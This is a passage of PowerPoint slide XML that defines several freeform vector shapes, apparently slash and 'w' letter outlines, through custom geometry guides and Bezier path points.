              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0030496A-DB9E-4018-9909-2FDAE887241E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId63"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5311776" y="3046413"/>
              <a:ext cx="85725" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 203"/>
                <a:gd name="T1" fmla="*/ 30 h 388"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 186 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 168 w 203"/>
                <a:gd name="T7" fmla="*/ 14 h 388"/>
                <a:gd name="T8" fmla="*/ 4 w 203"/>
                <a:gd name="T9" fmla="*/ 358 h 388"/>
                <a:gd name="T10" fmla="*/ 0 w 203"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 17 w 203"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 35 w 203"/>
                <a:gd name="T15" fmla="*/ 374 h 388"/>
                <a:gd name="T16" fmla="*/ 199 w 203"/>
                <a:gd name="T17" fmla="*/ 3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388">
                  <a:moveTo>
                    <a:pt x="199" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="9"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="171" y="8"/>
                    <a:pt x="168" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="7" y="388"/>
                    <a:pt x="17" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="388"/>
                    <a:pt x="32" y="380"/>
                    <a:pt x="35" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199"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2" name="Freeform 163">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B21A388D-D99A-4432-A4D1-3B984559A1E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId64"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5413376" y="3103563"/>
              <a:ext cx="104775" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 220 w 246"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 246 w 246"/>
                <a:gd name="T3" fmla="*/ 15 h 217"/>
                <a:gd name="T4" fmla="*/ 225 w 246"/>
                <a:gd name="T5" fmla="*/ 0 h 217"/>
                <a:gd name="T6" fmla="*/ 167 w 246"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 146 w 246"/>
                <a:gd name="T9" fmla="*/ 15 h 217"/>
                <a:gd name="T10" fmla="*/ 167 w 246"/>
                <a:gd name="T11" fmla="*/ 31 h 217"/>
                <a:gd name="T12" fmla="*/ 192 w 246"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 167 w 246"/>
                <a:gd name="T15" fmla="*/ 179 h 217"/>
                <a:gd name="T16" fmla="*/ 166 w 246"/>
                <a:gd name="T17" fmla="*/ 179 h 217"/>
                <a:gd name="T18" fmla="*/ 152 w 246"/>
                <a:gd name="T19" fmla="*/ 123 h 217"/>
                <a:gd name="T20" fmla="*/ 124 w 246"/>
                <a:gd name="T21" fmla="*/ 86 h 217"/>
                <a:gd name="T22" fmla="*/ 104 w 246"/>
                <a:gd name="T23" fmla="*/ 97 h 217"/>
                <a:gd name="T24" fmla="*/ 80 w 246"/>
                <a:gd name="T25" fmla="*/ 179 h 217"/>
                <a:gd name="T26" fmla="*/ 80 w 246"/>
                <a:gd name="T27" fmla="*/ 179 h 217"/>
                <a:gd name="T28" fmla="*/ 54 w 246"/>
                <a:gd name="T29" fmla="*/ 31 h 217"/>
                <a:gd name="T30" fmla="*/ 79 w 246"/>
                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 99 w 246"/>
                <a:gd name="T33" fmla="*/ 16 h 217"/>
                <a:gd name="T34" fmla="*/ 79 w 246"/>
                <a:gd name="T35" fmla="*/ 0 h 217"/>
                <a:gd name="T36" fmla="*/ 21 w 246"/>
                <a:gd name="T37" fmla="*/ 0 h 217"/>
                <a:gd name="T38" fmla="*/ 0 w 246"/>
                <a:gd name="T39" fmla="*/ 15 h 217"/>
                <a:gd name="T40" fmla="*/ 26 w 246"/>
                <a:gd name="T41" fmla="*/ 31 h 217"/>
                <a:gd name="T42" fmla="*/ 56 w 246"/>
                <a:gd name="T43" fmla="*/ 198 h 217"/>
                <a:gd name="T44" fmla="*/ 79 w 246"/>
                <a:gd name="T45" fmla="*/ 217 h 217"/>
                <a:gd name="T46" fmla="*/ 109 w 246"/>
                <a:gd name="T47" fmla="*/ 182 h 217"/>
                <a:gd name="T48" fmla="*/ 124 w 246"/>
                <a:gd name="T49" fmla="*/ 121 h 217"/>
                <a:gd name="T50" fmla="*/ 124 w 246"/>
                <a:gd name="T51" fmla="*/ 121 h 217"/>
                <a:gd name="T52" fmla="*/ 147 w 246"/>
                <a:gd name="T53" fmla="*/ 209 h 217"/>
                <a:gd name="T54" fmla="*/ 168 w 246"/>
                <a:gd name="T55" fmla="*/ 217 h 217"/>
                <a:gd name="T56" fmla="*/ 190 w 246"/>
                <a:gd name="T57" fmla="*/ 198 h 217"/>
                <a:gd name="T58" fmla="*/ 220 w 246"/>
                <a:gd name="T59" fmla="*/ 3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6" h="217">
                  <a:moveTo>
                    <a:pt x="220" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="31"/>
                    <a:pt x="246" y="31"/>
                    <a:pt x="246" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="0"/>
                    <a:pt x="234" y="0"/>
                    <a:pt x="225" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="0"/>
                    <a:pt x="146" y="0"/>
                    <a:pt x="146" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="31"/>
                    <a:pt x="158" y="31"/>
                    <a:pt x="167" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="192" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="166"/>
                    <a:pt x="158" y="143"/>
                    <a:pt x="152" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="92"/>
                    <a:pt x="141" y="86"/>
                    <a:pt x="124" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="86"/>
                    <a:pt x="109" y="86"/>
                    <a:pt x="104" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="101"/>
                    <a:pt x="82" y="169"/>
                    <a:pt x="80" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="80" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="31"/>
                    <a:pt x="99" y="31"/>
                    <a:pt x="99" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="0"/>
                    <a:pt x="88" y="0"/>
                    <a:pt x="79" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="11" y="31"/>
                    <a:pt x="26" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="198"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="210"/>
                    <a:pt x="59" y="217"/>
                    <a:pt x="79" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="217"/>
                    <a:pt x="100" y="213"/>
                    <a:pt x="109" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="138"/>
                    <a:pt x="122" y="132"/>
                    <a:pt x="124" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="146"/>
                    <a:pt x="145" y="205"/>
                    <a:pt x="147" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="217"/>
                    <a:pt x="162" y="217"/>
                    <a:pt x="168" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="217"/>
                    <a:pt x="188" y="209"/>
                    <a:pt x="190" y="198"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="220" y="3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3" name="Freeform 164">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C1B2A39-562E-41A5-99DC-86CCB3714AFA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId65"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5524501" y="3103563"/>
              <a:ext cx="103188" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 220 w 245"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 245 w 245"/>
                <a:gd name="T3" fmla="*/ 15 h 217"/>
                <a:gd name="T4" fmla="*/ 224 w 245"/>
                <a:gd name="T5" fmla="*/ 0 h 217"/>
                <a:gd name="T6" fmla="*/ 167 w 245"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 146 w 245"/>
                <a:gd name="T9" fmla="*/ 15 h 217"/>
                <a:gd name="T10" fmla="*/ 167 w 245"/>
                <a:gd name="T11" fmla="*/ 31 h 217"/>
                <a:gd name="T12" fmla="*/ 191 w 245"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 166 w 245"/>
                <a:gd name="T15" fmla="*/ 179 h 217"/>
                <a:gd name="T16" fmla="*/ 166 w 245"/>
                <a:gd name="T17" fmla="*/ 179 h 217"/>
                <a:gd name="T18" fmla="*/ 151 w 245"/>
                <a:gd name="T19" fmla="*/ 123 h 217"/>
                <a:gd name="T20" fmla="*/ 123 w 245"/>
                <a:gd name="T21" fmla="*/ 86 h 217"/>
                <a:gd name="T22" fmla="*/ 103 w 245"/>
                <a:gd name="T23" fmla="*/ 97 h 217"/>
                <a:gd name="T24" fmla="*/ 80 w 245"/>
                <a:gd name="T25" fmla="*/ 179 h 217"/>
                <a:gd name="T26" fmla="*/ 80 w 245"/>
                <a:gd name="T27" fmla="*/ 179 h 217"/>
                <a:gd name="T28" fmla="*/ 54 w 245"/>
                <a:gd name="T29" fmla="*/ 31 h 217"/>
                <a:gd name="T30" fmla="*/ 78 w 245"/>
                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 99 w 245"/>
                <a:gd name="T33" fmla="*/ 16 h 217"/>
                <a:gd name="T34" fmla="*/ 78 w 245"/>
                <a:gd name="T35" fmla="*/ 0 h 217"/>
                <a:gd name="T36" fmla="*/ 21 w 245"/>
                <a:gd name="T37" fmla="*/ 0 h 217"/>
                <a:gd name="T38" fmla="*/ 0 w 245"/>
                <a:gd name="T39" fmla="*/ 15 h 217"/>
                <a:gd name="T40" fmla="*/ 25 w 245"/>
                <a:gd name="T41" fmla="*/ 31 h 217"/>
                <a:gd name="T42" fmla="*/ 55 w 245"/>
                <a:gd name="T43" fmla="*/ 198 h 217"/>
                <a:gd name="T44" fmla="*/ 79 w 245"/>
                <a:gd name="T45" fmla="*/ 217 h 217"/>
                <a:gd name="T46" fmla="*/ 109 w 245"/>
                <a:gd name="T47" fmla="*/ 182 h 217"/>
                <a:gd name="T48" fmla="*/ 123 w 245"/>
                <a:gd name="T49" fmla="*/ 121 h 217"/>
                <a:gd name="T50" fmla="*/ 124 w 245"/>
                <a:gd name="T51" fmla="*/ 121 h 217"/>
                <a:gd name="T52" fmla="*/ 147 w 245"/>
                <a:gd name="T53" fmla="*/ 209 h 217"/>
                <a:gd name="T54" fmla="*/ 168 w 245"/>
                <a:gd name="T55" fmla="*/ 217 h 217"/>
                <a:gd name="T56" fmla="*/ 190 w 245"/>
                <a:gd name="T57" fmla="*/ 198 h 217"/>
                <a:gd name="T58" fmla="*/ 220 w 245"/>
                <a:gd name="T59" fmla="*/ 3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5" h="217">
                  <a:moveTo>
                    <a:pt x="220" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="31"/>
                    <a:pt x="245" y="31"/>
                    <a:pt x="245" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245" y="0"/>
                    <a:pt x="233" y="0"/>
                    <a:pt x="224" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="0"/>
                    <a:pt x="146" y="0"/>
                    <a:pt x="146" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="31"/>
                    <a:pt x="157" y="31"/>
                    <a:pt x="167" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="191" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="166"/>
                    <a:pt x="157" y="143"/>
                    <a:pt x="151" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="92"/>
                    <a:pt x="141" y="86"/>
                    <a:pt x="123" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="118" y="86"/>
                    <a:pt x="109" y="86"/>
                    <a:pt x="103" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="101"/>
                    <a:pt x="82" y="169"/>
                    <a:pt x="80" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="80" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="78" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="31"/>
                    <a:pt x="99" y="31"/>
                    <a:pt x="99" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="0"/>
                    <a:pt x="88" y="0"/>
                    <a:pt x="78" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="10" y="31"/>
                    <a:pt x="25" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="55" y="198"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="57" y="210"/>
                    <a:pt x="59" y="217"/>
                    <a:pt x="79" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="217"/>
                    <a:pt x="100" y="213"/>
                    <a:pt x="109" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="121" y="138"/>
                    <a:pt x="122" y="132"/>
                    <a:pt x="123" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="146"/>
                    <a:pt x="145" y="205"/>
                    <a:pt x="147" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="217"/>
                    <a:pt x="162" y="217"/>
                    <a:pt x="168" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="217"/>
                    <a:pt x="188" y="209"/>
                    <a:pt x="190" y="198"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="220" y="3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4" name="Freeform 165">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D81E2839-AAD5-49E4-AC56-5F566B5C225A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId66"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5635626" y="3103563"/>
              <a:ext cx="103188" cy="95250"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 220 w 246"/>
                <a:gd name="T1" fmla="*/ 31 h 217"/>
                <a:gd name="T2" fmla="*/ 246 w 246"/>
                <a:gd name="T3" fmla="*/ 15 h 217"/>
                <a:gd name="T4" fmla="*/ 225 w 246"/>
                <a:gd name="T5" fmla="*/ 0 h 217"/>
                <a:gd name="T6" fmla="*/ 167 w 246"/>
                <a:gd name="T7" fmla="*/ 0 h 217"/>
                <a:gd name="T8" fmla="*/ 146 w 246"/>
                <a:gd name="T9" fmla="*/ 15 h 217"/>
                <a:gd name="T10" fmla="*/ 167 w 246"/>
                <a:gd name="T11" fmla="*/ 31 h 217"/>
                <a:gd name="T12" fmla="*/ 192 w 246"/>
                <a:gd name="T13" fmla="*/ 31 h 217"/>
                <a:gd name="T14" fmla="*/ 167 w 246"/>
                <a:gd name="T15" fmla="*/ 179 h 217"/>
                <a:gd name="T16" fmla="*/ 166 w 246"/>
                <a:gd name="T17" fmla="*/ 179 h 217"/>
                <a:gd name="T18" fmla="*/ 152 w 246"/>
                <a:gd name="T19" fmla="*/ 123 h 217"/>
                <a:gd name="T20" fmla="*/ 124 w 246"/>
                <a:gd name="T21" fmla="*/ 86 h 217"/>
                <a:gd name="T22" fmla="*/ 104 w 246"/>
                <a:gd name="T23" fmla="*/ 97 h 217"/>
                <a:gd name="T24" fmla="*/ 81 w 246"/>
                <a:gd name="T25" fmla="*/ 179 h 217"/>
                <a:gd name="T26" fmla="*/ 80 w 246"/>
                <a:gd name="T27" fmla="*/ 179 h 217"/>
                <a:gd name="T28" fmla="*/ 54 w 246"/>
                <a:gd name="T29" fmla="*/ 31 h 217"/>
                <a:gd name="T30" fmla="*/ 79 w 246"/>
                <a:gd name="T31" fmla="*/ 31 h 217"/>
                <a:gd name="T32" fmla="*/ 100 w 246"/>
                <a:gd name="T33" fmla="*/ 16 h 217"/>
                <a:gd name="T34" fmla="*/ 79 w 246"/>
                <a:gd name="T35" fmla="*/ 0 h 217"/>
                <a:gd name="T36" fmla="*/ 21 w 246"/>
                <a:gd name="T37" fmla="*/ 0 h 217"/>
                <a:gd name="T38" fmla="*/ 0 w 246"/>
                <a:gd name="T39" fmla="*/ 15 h 217"/>
                <a:gd name="T40" fmla="*/ 26 w 246"/>
                <a:gd name="T41" fmla="*/ 31 h 217"/>
                <a:gd name="T42" fmla="*/ 56 w 246"/>
                <a:gd name="T43" fmla="*/ 198 h 217"/>
                <a:gd name="T44" fmla="*/ 79 w 246"/>
                <a:gd name="T45" fmla="*/ 217 h 217"/>
                <a:gd name="T46" fmla="*/ 109 w 246"/>
                <a:gd name="T47" fmla="*/ 182 h 217"/>
                <a:gd name="T48" fmla="*/ 124 w 246"/>
                <a:gd name="T49" fmla="*/ 121 h 217"/>
                <a:gd name="T50" fmla="*/ 124 w 246"/>
                <a:gd name="T51" fmla="*/ 121 h 217"/>
                <a:gd name="T52" fmla="*/ 147 w 246"/>
                <a:gd name="T53" fmla="*/ 209 h 217"/>
                <a:gd name="T54" fmla="*/ 168 w 246"/>
                <a:gd name="T55" fmla="*/ 217 h 217"/>
                <a:gd name="T56" fmla="*/ 190 w 246"/>
                <a:gd name="T57" fmla="*/ 198 h 217"/>
                <a:gd name="T58" fmla="*/ 220 w 246"/>
                <a:gd name="T59" fmla="*/ 3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6" h="217">
                  <a:moveTo>
                    <a:pt x="220" y="31"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="235" y="31"/>
                    <a:pt x="246" y="31"/>
                    <a:pt x="246" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="246" y="0"/>
                    <a:pt x="234" y="0"/>
                    <a:pt x="225" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="0"/>
                    <a:pt x="146" y="0"/>
                    <a:pt x="146" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="31"/>
                    <a:pt x="158" y="31"/>
                    <a:pt x="167" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="192" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="167" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="166" y="179"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="164" y="166"/>
                    <a:pt x="158" y="143"/>
                    <a:pt x="152" y="123"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="143" y="92"/>
                    <a:pt x="141" y="86"/>
                    <a:pt x="124" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="119" y="86"/>
                    <a:pt x="109" y="86"/>
                    <a:pt x="104" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="101"/>
                    <a:pt x="83" y="169"/>
                    <a:pt x="81" y="179"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="80" y="179"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="54" y="31"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="79" y="31"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="31"/>
                    <a:pt x="100" y="31"/>
                    <a:pt x="100" y="16"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="100" y="0"/>
                    <a:pt x="88" y="0"/>
                    <a:pt x="79" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="21" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="0"/>
                    <a:pt x="0" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="31"/>
                    <a:pt x="11" y="31"/>
                    <a:pt x="26" y="31"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="56" y="198"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="210"/>
                    <a:pt x="59" y="217"/>
                    <a:pt x="79" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="217"/>
                    <a:pt x="101" y="213"/>
                    <a:pt x="109" y="182"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="122" y="138"/>
                    <a:pt x="122" y="132"/>
                    <a:pt x="124" y="121"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="124" y="121"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="146"/>
                    <a:pt x="145" y="205"/>
                    <a:pt x="147" y="209"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="153" y="217"/>
                    <a:pt x="162" y="217"/>
                    <a:pt x="168" y="217"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="217"/>
                    <a:pt x="188" y="209"/>
                    <a:pt x="190" y="198"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="220" y="3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5" name="Freeform 166">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B28C408-3849-4084-9759-80F6A27EC9EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId67"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5754689" y="3046413"/>
              <a:ext cx="85725" cy="169863"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 199 w 203"/>
                <a:gd name="T1" fmla="*/ 30 h 388"/>
                <a:gd name="T2" fmla="*/ 203 w 203"/>
                <a:gd name="T3" fmla="*/ 18 h 388"/>
                <a:gd name="T4" fmla="*/ 186 w 203"/>
                <a:gd name="T5" fmla="*/ 0 h 388"/>
                <a:gd name="T6" fmla="*/ 168 w 203"/>
                <a:gd name="T7" fmla="*/ 14 h 388"/>
                <a:gd name="T8" fmla="*/ 4 w 203"/>
                <a:gd name="T9" fmla="*/ 358 h 388"/>
                <a:gd name="T10" fmla="*/ 0 w 203"/>
                <a:gd name="T11" fmla="*/ 370 h 388"/>
                <a:gd name="T12" fmla="*/ 17 w 203"/>
                <a:gd name="T13" fmla="*/ 388 h 388"/>
                <a:gd name="T14" fmla="*/ 35 w 203"/>
                <a:gd name="T15" fmla="*/ 374 h 388"/>
                <a:gd name="T16" fmla="*/ 199 w 203"/>
                <a:gd name="T17" fmla="*/ 3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388">
                  <a:moveTo>
                    <a:pt x="199" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="22"/>
                    <a:pt x="203" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="203" y="9"/>
                    <a:pt x="196" y="0"/>
                    <a:pt x="186" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="171" y="8"/>
                    <a:pt x="168" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="4" y="358"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="366"/>
                    <a:pt x="0" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="379"/>
                    <a:pt x="7" y="388"/>
                    <a:pt x="17" y="388"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="388"/>
                    <a:pt x="32" y="380"/>
                    <a:pt x="35" y="374"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="199"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6" name="Freeform 167">
              <a:extLst>
